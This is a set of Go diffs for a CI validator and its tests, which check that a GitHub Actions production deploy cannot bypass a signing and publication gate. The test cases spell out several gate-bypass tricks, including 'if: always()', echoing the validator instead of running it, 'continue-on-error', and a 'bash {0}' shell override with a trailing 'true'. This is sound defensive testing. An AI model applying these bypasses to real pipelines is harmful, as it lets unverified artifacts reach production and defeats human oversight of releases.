+		// The trailing paren is what distinguishes the FUNCTION `failure()` from
+		// the ordinary result comparison `needs.x.result == 'failure'`, which
+		// overrides nothing and must stay allowed.
+		if strings.Contains(normalised, override+"(") {
 			return fmt.Errorf(
-				"merge-queue job %s conditions its run on %s), which makes it eligible even when a job it "+
+				"merge-queue job %s conditions its run on %s(), which makes it eligible even when a job it "+
 					"`needs` has FAILED — including the job that runs the publication validator, so it can "+
 					"publish to production behind a gate that already failed (condition: %v)",
 				production.name, override, condition,

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -363,10 +363,28 @@ func enforcesFailure(node map[string]any, description string) error {
 // shellControlFlow are the tokens that make a run block something other than a
 // straight-line sequence of commands. Any of them means the check can no longer
 // say the validator is reached.
-var shellControlFlow = []string{
-	"if ", "if\t", "then", "else", "elif", "fi",
-	"for ", "while ", "until ", "do", "done",
-	"case ", "esac", "exit", "return", "&&", "||", ";", "|", "trap ", "eval ",
+// Keywords are matched as WORDS, operators as substrings. `strings.Contains`
+// on the keywords was wrong in a way whose failure direction is safe but whose
+// MESSAGE lies: `docker buildx …` contains "do" and `gh run download` contains
+// "do" too, so a legitimate step was rejected naming a token it does not use.
+// A guard that refuses correct work with a false explanation is a guard people
+// learn to route around.
+var (
+	shellKeywords = []string{
+		"if", "then", "else", "elif", "fi",
+		"for", "while", "until", "do", "done",
+		"case", "esac", "exit", "return", "trap", "eval", "source",
+	}
+	shellOperators = []string{"&&", "||", ";", "|", "`", "$("}
+)
+
+// shellWords splits a line on whitespace, which is enough to tell the keyword
+// `do` from the command `docker`. It is not a shell lexer and does not need to
+// be: anything it cannot separate stays in one token and simply fails to match
+// a keyword, which leaves the line accepted only if it also carries no
+// operator — and the operator set is what quoting and substitution live in.
+func shellWords(line string) []string {
+	return strings.Fields(line)
 }
 
 // runBlockIsSimpleSequence requires the gate step to be a straight-line
@@ -392,18 +410,29 @@ func runBlockIsSimpleSequence(step map[string]any, jobName string) error {
 		if trimmed == "" || strings.HasPrefix(trimmed, "#") {
 			continue
 		}
-		for _, token := range shellControlFlow {
-			if strings.Contains(trimmed, token) {
-				return fmt.Errorf(
-					"the validator step in %s uses shell control flow or chaining (%q in %q); "+
-						"the gate must be a straight-line sequence of commands, or finding the validator line "+
-						"does not establish that the shell reaches it",
-					jobName, strings.TrimSpace(token), trimmed,
-				)
+		for _, word := range shellWords(trimmed) {
+			for _, keyword := range shellKeywords {
+				if word == keyword {
+					return controlFlowError(jobName, keyword, trimmed)
+				}
+			}
+		}
+		for _, operator := range shellOperators {
+			if strings.Contains(trimmed, operator) {
+				return controlFlowError(jobName, operator, trimmed)
 			}
 		}
 	}
 	return nil
+}
+
+func controlFlowError(jobName string, token string, line string) error {
+	return fmt.Errorf(
+		"the validator step in %s uses shell control flow or chaining (%q in %q); "+
+			"the gate must be a straight-line sequence of commands, or finding the validator line "+
+			"does not establish that the shell reaches it",
+		jobName, token, line,
+	)
 }
 
 // stringListContains reports whether a parsed YAML value is a sequence (or a

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -114,6 +114,21 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 		"deploy no longer uses the shared action": func(s string) string {
 			return strings.Replace(s, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/other\n", 1)
 		},
+		// Raised by CodeRabbit: a substring match is satisfied by a longer path
+		// that merely starts with the wanted one, so the tripwire would stay
+		// green across exactly the change it exists to notice. Both directions
+		// of that mistake are pinned — a sibling action and a nested one.
+		"deploy uses a SIBLING action with the same prefix": func(s string) string {
+			return strings.Replace(s, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/deploy-prod-canary\n", 1)
+		},
+		"deploy uses a NESTED action under the same path": func(s string) string {
+			return strings.Replace(
+				s,
+				"uses: ./.github/actions/deploy-prod\n",
+				"uses: ./.github/actions/deploy-prod/publish-platform-manifests\n",
+				1,
+			)
+		},
 	} {
 		ablated := ablate(cd)
 		if ablated == cd {

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -2,6 +2,7 @@ package main
 
 import (
 	"bytes"
+	"errors"
 	"os"
 	"path/filepath"
 	"strings"
@@ -288,6 +289,27 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// Codex P2, round 5: the FOURTH matched step whose metadata I discarded —
+		// the nested publisher itself. Skipping it lets the shared action pass
+		// straight over the stage/sign/attest/promote transaction and carry on
+		// into reconciliation. requireEnforcedStep now makes this cell, and any
+		// future one, unrepresentable.
+		"nested publisher step is skipped": func(w, a string) (string, string) {
+			return w, strings.Replace(
+				a,
+				"      uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				"      if: false\n      uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				1,
+			)
+		},
+		"nested publisher step suppresses failure": func(w, a string) (string, string) {
+			return w, strings.Replace(
+				a,
+				"      uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				"      continue-on-error: true\n      uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				1,
+			)
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.
@@ -379,13 +401,11 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 		t.Fatal("the lone-scalar needs form must satisfy it")
 	}
 
-	// jobStepRunningCommand: the command quoted inside another command is not run.
-	echoed := map[string]any{"steps": []any{map[string]any{"run": "echo \"go run ./x\"\n"}}}
-	if _, ok := jobStepRunningCommand(echoed, "go run ./x"); ok {
+	// runsCommand: the command quoted inside another command is not run.
+	if runsCommand("go run ./x")(map[string]any{"run": "echo \"go run ./x\"\n"}) {
 		t.Fatal("an echoed command must not count as executed")
 	}
-	executed := map[string]any{"steps": []any{map[string]any{"run": "go test ./x\ngo run ./x\n"}}}
-	if _, ok := jobStepRunningCommand(executed, "go run ./x"); !ok {
+	if !runsCommand("go run ./x")(map[string]any{"run": "go test ./x\ngo run ./x\n"}) {
 		t.Fatal("a command on its own run line must count as executed")
 	}
 
@@ -406,27 +426,44 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	}
 
 	// jobUsesAction: equality, so a prefix-sharing sibling is a different action.
-	sibling := map[string]any{"steps": []any{map[string]any{"uses": "./a/b-canary"}}}
-	if _, ok := jobStepUsingAction(sibling, "./a/b"); ok {
+	// usesAction: equality, so a prefix-sharing sibling is a different action.
+	if usesAction("./a/b")(map[string]any{"uses": "./a/b-canary"}) {
 		t.Fatal("a sibling path sharing a prefix must not satisfy an action check")
 	}
-	nested := map[string]any{"steps": []any{map[string]any{"uses": "./a/b/c"}}}
-	if _, ok := jobStepUsingAction(nested, "./a/b"); ok {
+	if usesAction("./a/b")(map[string]any{"uses": "./a/b/c"}) {
 		t.Fatal("a nested path must not satisfy an action check")
 	}
 	// POSITIVE case — without it a jobUsesAction that always returned false
 	// would pass both assertions above. Same argument as the enforcesFailure
 	// positive case; it applies here too and I had not applied it.
-	exact := map[string]any{"steps": []any{map[string]any{"uses": "./a/b", "id": "wanted"}}}
-	found, ok := jobStepUsingAction(exact, "./a/b")
-	if !ok {
+	if !usesAction("./a/b")(map[string]any{"uses": "./a/b"}) {
 		t.Fatal("the exact action path must satisfy an action check")
 	}
-	// It must return the MATCHED step, not merely report one exists — the
-	// caller applies enforcesFailure to it, so the wrong step would silently
-	// check the wrong metadata.
+
+	// 🔴 requireEnforcedStep is where matching and enforcing became ONE
+	// operation, after four review rounds each found a different matched step
+	// whose metadata had been discarded. These assert that they cannot be
+	// separated again: a matching-but-skipped step is an ERROR, not a hit.
+	missing := errors.New("no such step")
+	container := map[string]any{"steps": []any{
+		map[string]any{"uses": "./other"},
+		map[string]any{"uses": "./a/b", "id": "wanted"},
+	}}
+	found, err := requireEnforcedStep(container, usesAction("./a/b"), missing, "x")
+	if err != nil {
+		t.Fatalf("an enforced matching step must be returned: %v", err)
+	}
 	if found["id"] != "wanted" {
 		t.Fatalf("returned the wrong step: %v", found)
+	}
+	if _, err := requireEnforcedStep(container, usesAction("./nope"), missing, "x"); !errors.Is(err, missing) {
+		t.Fatalf("an absent step must return the caller's error, got %v", err)
+	}
+	for name, meta := range map[string]any{"if": "false", "continue-on-error": true} {
+		skipped := map[string]any{"steps": []any{map[string]any{"uses": "./a/b", name: meta}}}
+		if _, err := requireEnforcedStep(skipped, usesAction("./a/b"), missing, "x"); err == nil {
+			t.Fatalf("a matching step carrying %s must NOT be returned as a hit", name)
+		}
 	}
 
 	// runBlockIsSimpleSequence: keywords match as WORDS, operators as

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -36,6 +36,118 @@ func TestRealClusterConfigAllowsTheDRIdentity(t *testing.T) {
 	}
 }
 
+func TestRealDirectPushWorkflowIsGatedByTheContract(t *testing.T) {
+	t.Parallel()
+
+	if err := validateCDWiring(repoFile(t, ".github/workflows/cd.yaml")); err != nil {
+		t.Fatalf("shipped cd.yaml can deploy to production without the publication contract: %v", err)
+	}
+}
+
+// TestMisorderedPublicationIsRefusedOnTheDirectPushPath is the end-to-end
+// property #2879 asks for: a deliberately mis-ordered publication must be
+// refused on the CD route, not merely on the PR route.
+//
+// It is two facts, and BOTH are required. The contract must reject the bad
+// input (first half), and the CD deploy job must be unable to run without that
+// rejection reaching it (second half). Either alone is satisfied by a workflow
+// that still ships unsigned bytes: a validator nothing depends on, or a
+// dependency on a validator that accepts anything.
+func TestMisorderedPublicationIsRefusedOnTheDirectPushPath(t *testing.T) {
+	t.Parallel()
+
+	action := repoFile(t, ".github/actions/deploy-prod/publish-platform-manifests/action.yml")
+	if err := validatePublicationAction(action); err != nil {
+		t.Fatalf("precondition: the shipped action must PASS before ablating it: %v", err)
+	}
+
+	// Push straight to the promoted reference instead of the staging one — the
+	// exact ordering defect #2627 tracks.
+	misordered := strings.Replace(
+		action,
+		`workload push "${STAGING_OCI_REF}"`,
+		`workload push "${PROMOTED_OCI_REF}"`,
+		1,
+	)
+	if misordered == action {
+		t.Fatal("ablation changed nothing; re-aim it rather than trusting the result")
+	}
+	if err := validatePublicationAction(misordered); err == nil {
+		t.Fatal("a mis-ordered publication was accepted by the contract")
+	}
+
+	if err := validateCDWiring(repoFile(t, ".github/workflows/cd.yaml")); err != nil {
+		t.Fatalf("the refusal never reaches the direct-push deploy: %v", err)
+	}
+}
+
+func TestCDWiringRejectsEachAblation(t *testing.T) {
+	t.Parallel()
+
+	cd := repoFile(t, ".github/workflows/cd.yaml")
+	if err := validateCDWiring(cd); err != nil {
+		t.Fatalf("precondition: the shipped cd.yaml must PASS before ablating it: %v", err)
+	}
+
+	// Each ablation removes exactly one link in the chain that makes the gate
+	// real, and each must be refused. `unwired` matters most: the job is still
+	// present and still runs the validator, so the workflow reads as gated
+	// while the deploy no longer waits for it.
+	for name, ablate := range map[string]func(string) string{
+		"unwired": func(s string) string {
+			return strings.Replace(s, ", validate-publication-contract]", "]", 1)
+		},
+		"gate job removed": func(s string) string {
+			return strings.Replace(s, "  validate-publication-contract:", "  unrelated-job:", 1)
+		},
+		"gate no longer runs the validator": func(s string) string {
+			return strings.Replace(s, "go run ./scripts/validate-dr-signing", "echo skipped", 1)
+		},
+		"needs shape unreadable": func(s string) string {
+			return strings.Replace(
+				s,
+				"    needs: [validate-eks-authorization, validate-publication-contract]",
+				"    needs:\n      - validate-eks-authorization\n      - validate-publication-contract",
+				1,
+			)
+		},
+		"deploy no longer uses the shared action": func(s string) string {
+			return strings.Replace(s, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/other\n", 1)
+		},
+	} {
+		ablated := ablate(cd)
+		if ablated == cd {
+			t.Fatalf("%s: ablation changed nothing; re-aim it rather than trusting the result", name)
+		}
+		if err := validateCDWiring(ablated); err == nil {
+			t.Fatalf("%s: ablation was accepted, so the check does not constrain it", name)
+		}
+	}
+}
+
+func TestJobNeedsReportsUnreadableShapesAsUnestablished(t *testing.T) {
+	t.Parallel()
+
+	// The failure direction that matters: a shape this cannot parse must never
+	// come back as a populated list, or an unrecognised workflow style would
+	// read as "gated" with nothing having been checked.
+	for name, job := range map[string]string{
+		"block form":   "    needs:\n      - a\n      - b\n",
+		"empty inline": "    needs: []\n",
+		"scalar form":  "    needs: validate-eks-authorization\n",
+		"absent":       "    runs-on: ubuntu-latest\n",
+	} {
+		if names, ok := jobNeeds(job); ok {
+			t.Fatalf("%s: expected unestablished, got %v", name, names)
+		}
+	}
+
+	names, ok := jobNeeds("    needs: [a, b]\n")
+	if !ok || len(names) != 2 || names[0] != "a" || names[1] != "b" {
+		t.Fatalf("inline form should parse to [a b], got %v (ok=%v)", names, ok)
+	}
+}
+
 func TestDRWorkflowContractRejectsEachAblation(t *testing.T) {
 	t.Parallel()
 

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -39,9 +39,15 @@ func TestRealClusterConfigAllowsTheDRIdentity(t *testing.T) {
 func TestRealDirectPushWorkflowIsGatedByTheContract(t *testing.T) {
 	t.Parallel()
 
-	if err := validateCDWiring(repoFile(t, ".github/workflows/cd.yaml")); err != nil {
+	if err := validateCDWiring(cdWorkflow(t), deployAction(t)); err != nil {
 		t.Fatalf("shipped cd.yaml can deploy to production without the publication contract: %v", err)
 	}
+}
+
+func cdWorkflow(t *testing.T) string { t.Helper(); return repoFile(t, ".github/workflows/cd.yaml") }
+func deployAction(t *testing.T) string {
+	t.Helper()
+	return repoFile(t, ".github/actions/deploy-prod/action.yml")
 }
 
 // TestMisorderedPublicationIsRefusedOnTheDirectPushPath is the end-to-end
@@ -76,7 +82,7 @@ func TestMisorderedPublicationIsRefusedOnTheDirectPushPath(t *testing.T) {
 		t.Fatal("a mis-ordered publication was accepted by the contract")
 	}
 
-	if err := validateCDWiring(repoFile(t, ".github/workflows/cd.yaml")); err != nil {
+	if err := validateCDWiring(cdWorkflow(t), deployAction(t)); err != nil {
 		t.Fatalf("the refusal never reaches the direct-push deploy: %v", err)
 	}
 }
@@ -84,82 +90,128 @@ func TestMisorderedPublicationIsRefusedOnTheDirectPushPath(t *testing.T) {
 func TestCDWiringRejectsEachAblation(t *testing.T) {
 	t.Parallel()
 
-	cd := repoFile(t, ".github/workflows/cd.yaml")
-	if err := validateCDWiring(cd); err != nil {
-		t.Fatalf("precondition: the shipped cd.yaml must PASS before ablating it: %v", err)
+	cd := cdWorkflow(t)
+	action := deployAction(t)
+	if err := validateCDWiring(cd, action); err != nil {
+		t.Fatalf("precondition: the shipped workflow must PASS before ablating it: %v", err)
 	}
 
 	// Each ablation removes exactly one link in the chain that makes the gate
-	// real, and each must be refused. `unwired` matters most: the job is still
-	// present and still runs the validator, so the workflow reads as gated
-	// while the deploy no longer waits for it.
-	for name, ablate := range map[string]func(string) string{
-		"unwired": func(s string) string {
-			return strings.Replace(s, ", validate-publication-contract]", "]", 1)
+	// real, and each must be refused. The last four were raised by Codex against
+	// the text-scanning version of this check, and every one of them left a
+	// workflow that READ as gated — which is what makes them worth pinning
+	// rather than fixing quietly.
+	for name, ablate := range map[string]func(string, string) (string, string){
+		"unwired": func(w, a string) (string, string) {
+			return strings.Replace(w, ", validate-publication-contract]", "]", 1), a
 		},
-		"gate job removed": func(s string) string {
-			return strings.Replace(s, "  validate-publication-contract:", "  unrelated-job:", 1)
+		"gate job removed": func(w, a string) (string, string) {
+			return strings.Replace(w, "  validate-publication-contract:", "  unrelated-job:", 1), a
 		},
-		"gate no longer runs the validator": func(s string) string {
-			return strings.Replace(s, "go run ./scripts/validate-dr-signing", "echo skipped", 1)
+		"gate no longer runs the validator": func(w, a string) (string, string) {
+			return strings.Replace(w, "go run ./scripts/validate-dr-signing", "echo skipped", 1), a
 		},
-		"needs shape unreadable": func(s string) string {
+		"deploy no longer uses the shared action": func(w, a string) (string, string) {
+			return strings.Replace(w, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/other\n", 1), a
+		},
+		"deploy uses a SIBLING action with the same prefix": func(w, a string) (string, string) {
+			return strings.Replace(w, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/deploy-prod-canary\n", 1), a
+		},
+		"deploy uses a NESTED action under the same path": func(w, a string) (string, string) {
 			return strings.Replace(
-				s,
+				w, "uses: ./.github/actions/deploy-prod\n",
+				"uses: ./.github/actions/deploy-prod/publish-platform-manifests\n", 1,
+			), a
+		},
+		// Codex P2: the gate ECHOES the command instead of running it. Exits 0,
+		// validates nothing, and a substring scan of the run block accepts it.
+		"gate ECHOES the validator instead of running it": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml",
+				`          echo "go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml"`,
+				1,
+			), a
+		},
+		// Codex P2: the dependency is deleted, but text that LOOKS like it
+		// survives elsewhere in the job. A line scan reports a dependency
+		// GitHub does not have.
+		"needs deleted while a heredoc still contains the text": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
 				"    needs: [validate-eks-authorization, validate-publication-contract]",
-				"    needs:\n      - validate-eks-authorization\n      - validate-publication-contract",
+				"    needs: [validate-eks-authorization]\n    env:\n      NOTE: \"needs: [validate-publication-contract]\"",
 				1,
-			)
+			), a
 		},
-		"deploy no longer uses the shared action": func(s string) string {
-			return strings.Replace(s, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/other\n", 1)
-		},
-		// Raised by CodeRabbit: a substring match is satisfied by a longer path
-		// that merely starts with the wanted one, so the tripwire would stay
-		// green across exactly the change it exists to notice. Both directions
-		// of that mistake are pinned — a sibling action and a nested one.
-		"deploy uses a SIBLING action with the same prefix": func(s string) string {
-			return strings.Replace(s, "uses: ./.github/actions/deploy-prod\n", "uses: ./.github/actions/deploy-prod-canary\n", 1)
-		},
-		"deploy uses a NESTED action under the same path": func(s string) string {
+		// Codex P2, and the most dangerous of the set: `needs` is intact and
+		// `if: always()` schedules the deploy after the gate FAILS. Membership
+		// alone cannot see it, and the workflow reads entirely correct.
+		"deploy carries a job-level condition that survives a failed gate": func(w, a string) (string, string) {
 			return strings.Replace(
-				s,
-				"uses: ./.github/actions/deploy-prod\n",
-				"uses: ./.github/actions/deploy-prod/publish-platform-manifests\n",
+				w,
+				"    needs: [validate-eks-authorization, validate-publication-contract]",
+				"    needs: [validate-eks-authorization, validate-publication-contract]\n    if: always()",
 				1,
+			), a
+		},
+		// Codex P2: the contract is checked against the nested publisher, so it
+		// only means anything while the shared action still calls it. Otherwise
+		// the validator verifies an unused file and reports success.
+		"shared action no longer invokes the checked publisher": func(w, a string) (string, string) {
+			return w, strings.Replace(
+				a, "uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				"uses: ./.github/actions/deploy-prod/some-other-publisher", 1,
 			)
 		},
 	} {
-		ablated := ablate(cd)
-		if ablated == cd {
+		ablatedCD, ablatedAction := ablate(cd, action)
+		if ablatedCD == cd && ablatedAction == action {
 			t.Fatalf("%s: ablation changed nothing; re-aim it rather than trusting the result", name)
 		}
-		if err := validateCDWiring(ablated); err == nil {
+		if err := validateCDWiring(ablatedCD, ablatedAction); err == nil {
 			t.Fatalf("%s: ablation was accepted, so the check does not constrain it", name)
 		}
 	}
 }
 
-func TestJobNeedsReportsUnreadableShapesAsUnestablished(t *testing.T) {
+func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	t.Parallel()
 
-	// The failure direction that matters: a shape this cannot parse must never
-	// come back as a populated list, or an unrecognised workflow style would
-	// read as "gated" with nothing having been checked.
-	for name, job := range map[string]string{
-		"block form":   "    needs:\n      - a\n      - b\n",
-		"empty inline": "    needs: []\n",
-		"scalar form":  "    needs: validate-eks-authorization\n",
-		"absent":       "    runs-on: ubuntu-latest\n",
-	} {
-		if names, ok := jobNeeds(job); ok {
-			t.Fatalf("%s: expected unestablished, got %v", name, names)
-		}
+	// The failure direction that matters for all three: a shape the helper
+	// cannot read must report absence, never presence. An unrecognised workflow
+	// style reading as "gated" is the one outcome that lets a deploy through.
+	if stringListContains(map[string]any{"a": true}, "a") {
+		t.Fatal("a mapping must not satisfy a sequence membership test")
+	}
+	if stringListContains(nil, "a") {
+		t.Fatal("an absent value must not satisfy a membership test")
+	}
+	if !stringListContains([]any{"x", "validate-publication-contract"}, "validate-publication-contract") {
+		t.Fatal("a real sequence entry must satisfy it")
+	}
+	if !stringListContains("validate-publication-contract", "validate-publication-contract") {
+		t.Fatal("the lone-scalar needs form must satisfy it")
 	}
 
-	names, ok := jobNeeds("    needs: [a, b]\n")
-	if !ok || len(names) != 2 || names[0] != "a" || names[1] != "b" {
-		t.Fatalf("inline form should parse to [a b], got %v (ok=%v)", names, ok)
+	// jobRunsCommand: the command quoted inside another command is not run.
+	echoed := map[string]any{"steps": []any{map[string]any{"run": "echo \"go run ./x\"\n"}}}
+	if jobRunsCommand(echoed, "go run ./x") {
+		t.Fatal("an echoed command must not count as executed")
+	}
+	real := map[string]any{"steps": []any{map[string]any{"run": "go test ./x\ngo run ./x\n"}}}
+	if !jobRunsCommand(real, "go run ./x") {
+		t.Fatal("a command on its own run line must count as executed")
+	}
+
+	// jobUsesAction: equality, so a prefix-sharing sibling is a different action.
+	sibling := map[string]any{"steps": []any{map[string]any{"uses": "./a/b-canary"}}}
+	if jobUsesAction(sibling, "./a/b") {
+		t.Fatal("a sibling path sharing a prefix must not satisfy an action check")
+	}
+	nested := map[string]any{"steps": []any{map[string]any{"uses": "./a/b/c"}}}
+	if jobUsesAction(nested, "./a/b") {
+		t.Fatal("a nested path must not satisfy an action check")
 	}
 }
 

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -331,6 +331,42 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// CodeRabbit P1: the same key one SCOPE out. Refusing `steps[*].shell`
+		// leaves `defaults.run.shell` untouched at both job and workflow scope,
+		// and GitHub applies those to the very step this gate depends on. A
+		// custom template such as `bash {0}` takes full control of the shell
+		// options, so the default `-e` is gone and the trailing `true` carries
+		// a FAILED validator to exit 0. Both scopes get their own arm: they are
+		// separate keys in separate maps, and a fix that reads one and not the
+		// other passes whichever arm it happens to cover.
+		"job-level defaults.run.shell discards the validator verdict": func(w, a string) (string, string) {
+			w = strings.Replace(
+				w,
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    runs-on: ubuntu-latest\n",
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    runs-on: ubuntu-latest\n    defaults:\n      run:\n        shell: bash {0}\n",
+				1,
+			)
+			return strings.Replace(
+				w,
+				"          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml\n",
+				"          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml\n          true\n",
+				1,
+			), a
+		},
+		"workflow-level defaults.run.shell discards the validator verdict": func(w, a string) (string, string) {
+			w = strings.Replace(
+				w,
+				"\njobs:\n",
+				"\ndefaults:\n  run:\n    shell: bash {0}\n\njobs:\n",
+				1,
+			)
+			return strings.Replace(
+				w,
+				"          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml\n",
+				"          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml\n          true\n",
+				1,
+			), a
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.
@@ -493,7 +529,7 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	// message that names a token the step does not use. A guard that refuses
 	// correct work with a false explanation is one people route around.
 	ordinary := map[string]any{"run": "docker buildx imagetools inspect x\ngh run download y\ngo run ./scripts/v a b\n"}
-	if err := runBlockIsSimpleSequence(ordinary, "j"); err != nil {
+	if err := runBlockIsSimpleSequence(nil, nil, ordinary, "j"); err != nil {
 		t.Fatalf("ordinary commands containing keyword substrings must be accepted: %v", err)
 	}
 	// ...and the NEGATIVE half, or the relaxation above could have disabled it.
@@ -503,8 +539,30 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 		"chaining":     "true && go run ./x\n",
 		"substitution": "go run $(echo ./x)\n",
 	} {
-		if err := runBlockIsSimpleSequence(map[string]any{"run": run}, "j"); err == nil {
+		if err := runBlockIsSimpleSequence(nil, nil, map[string]any{"run": run}, "j"); err == nil {
 			t.Fatalf("%s must still be rejected", name)
+		}
+	}
+
+	// refuseShellOverride: each scope is read from its OWN key, so a fix that
+	// covers one scope cannot pass for another. The positive case is here too
+	// because a helper that refused everything would satisfy every negative
+	// case above while making the gate unusable.
+	if err := refuseShellOverride(
+		map[string]any{"defaults": map[string]any{"run": map[string]any{"working-directory": "x"}}},
+		map[string]any{"steps": []any{}},
+		map[string]any{"run": "go run ./x\n"},
+		"j",
+	); err != nil {
+		t.Fatalf("a workflow that sets defaults.run without a shell must be accepted: %v", err)
+	}
+	for name, scoped := range map[string][3]map[string]any{
+		"workflow scope": {{"defaults": map[string]any{"run": map[string]any{"shell": "bash {0}"}}}, nil, {}},
+		"job scope":      {nil, {"defaults": map[string]any{"run": map[string]any{"shell": "bash {0}"}}}, {}},
+		"step scope":     {nil, nil, {"shell": "bash {0}"}},
+	} {
+		if err := refuseShellOverride(scoped[0], scoped[1], scoped[2], "j"); err == nil {
+			t.Fatalf("a shell override at %s must be refused", name)
 		}
 	}
 }

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -54,37 +54,82 @@ func deployAction(t *testing.T) string {
 // property #2879 asks for: a deliberately mis-ordered publication must be
 // refused on the CD route, not merely on the PR route.
 //
-// It is two facts, and BOTH are required. The contract must reject the bad
-// input (first half), and the CD deploy job must be unable to run without that
-// rejection reaching it (second half). Either alone is satisfied by a workflow
-// that still ships unsigned bytes: a validator nothing depends on, or a
-// dependency on a validator that accepts anything.
+// 🔴 IT DRIVES run() OVER A REAL TREE, and the earlier version did not — it
+// ablated the publisher, checked the ablation separately, then called
+// validateCDWiring with the SHIPPED files. The misordered string never reached
+// the thing under test, so the second half merely repeated
+// TestRealDirectPushWorkflowIsGatedByTheContract and the test as a whole proved
+// only that two independent facts each held. That is the vacuous shape this
+// file exists to catch, and it survived here for a round.
 func TestMisorderedPublicationIsRefusedOnTheDirectPushPath(t *testing.T) {
 	t.Parallel()
 
-	action := repoFile(t, ".github/actions/deploy-prod/publish-platform-manifests/action.yml")
-	if err := validatePublicationAction(action); err != nil {
-		t.Fatalf("precondition: the shipped action must PASS before ablating it: %v", err)
+	// Baseline: the faithful copy must PASS, or the refusal below could be
+	// caused by the copying rather than by the ablation.
+	clean := repoTreeCopy(t, nil)
+	var stdout, stderr bytes.Buffer
+	if code := run(
+		filepath.Join(clean, ".github/workflows/dr-rebuild.yaml"),
+		filepath.Join(clean, "ksail.prod.yaml"),
+		&stdout, &stderr,
+	); code != 0 {
+		t.Fatalf("faithful copy of the shipped tree must pass, got %d: %s", code, stderr.String())
 	}
 
 	// Push straight to the promoted reference instead of the staging one — the
-	// exact ordering defect #2627 tracks.
-	misordered := strings.Replace(
-		action,
-		`workload push "${STAGING_OCI_REF}"`,
-		`workload push "${PROMOTED_OCI_REF}"`,
-		1,
+	// exact ordering defect #2627 tracks — and drive the whole CLI over it.
+	misordered := repoTreeCopy(t, map[string]func(string) string{
+		".github/actions/deploy-prod/publish-platform-manifests/action.yml": func(body string) string {
+			return strings.Replace(body, `workload push "${STAGING_OCI_REF}"`, `workload push "${PROMOTED_OCI_REF}"`, 1)
+		},
+	})
+	stdout.Reset()
+	stderr.Reset()
+	code := run(
+		filepath.Join(misordered, ".github/workflows/dr-rebuild.yaml"),
+		filepath.Join(misordered, "ksail.prod.yaml"),
+		&stdout, &stderr,
 	)
-	if misordered == action {
-		t.Fatal("ablation changed nothing; re-aim it rather than trusting the result")
+	if code == 0 {
+		t.Fatal("a mis-ordered publication was accepted on the direct-push path")
 	}
-	if err := validatePublicationAction(misordered); err == nil {
-		t.Fatal("a mis-ordered publication was accepted by the contract")
+	if !strings.Contains(stderr.String(), "staging") {
+		t.Fatalf("refusal does not name the ordering defect: %q", stderr.String())
 	}
+}
 
-	if err := validateCDWiring(cdWorkflow(t), deployAction(t)); err != nil {
-		t.Fatalf("the refusal never reaches the direct-push deploy: %v", err)
+// repoTreeCopy materialises the files the CLI reads into a temp tree, applying
+// an optional per-path mutation. Copying rather than mutating in place is what
+// lets the test drive the real entry point without touching the repository.
+func repoTreeCopy(t *testing.T, mutate map[string]func(string) string) string {
+	t.Helper()
+	root := t.TempDir()
+	for _, rel := range []string{
+		".github/workflows/dr-rebuild.yaml",
+		".github/workflows/cd.yaml",
+		".github/actions/deploy-prod/action.yml",
+		".github/actions/deploy-prod/publish-platform-manifests/action.yml",
+		"ksail.prod.yaml",
+	} {
+		body := repoFile(t, rel)
+		if mutate != nil {
+			if apply, ok := mutate[rel]; ok {
+				mutated := apply(body)
+				if mutated == body {
+					t.Fatalf("%s: mutation changed nothing; re-aim it rather than trusting the result", rel)
+				}
+				body = mutated
+			}
+		}
+		dest := filepath.Join(root, rel)
+		if err := os.MkdirAll(filepath.Dir(dest), 0o750); err != nil {
+			t.Fatalf("mkdir %s: %v", dest, err)
+		}
+		if err := os.WriteFile(dest, []byte(body), 0o600); err != nil {
+			t.Fatalf("write %s: %v", dest, err)
+		}
 	}
+	return root
 }
 
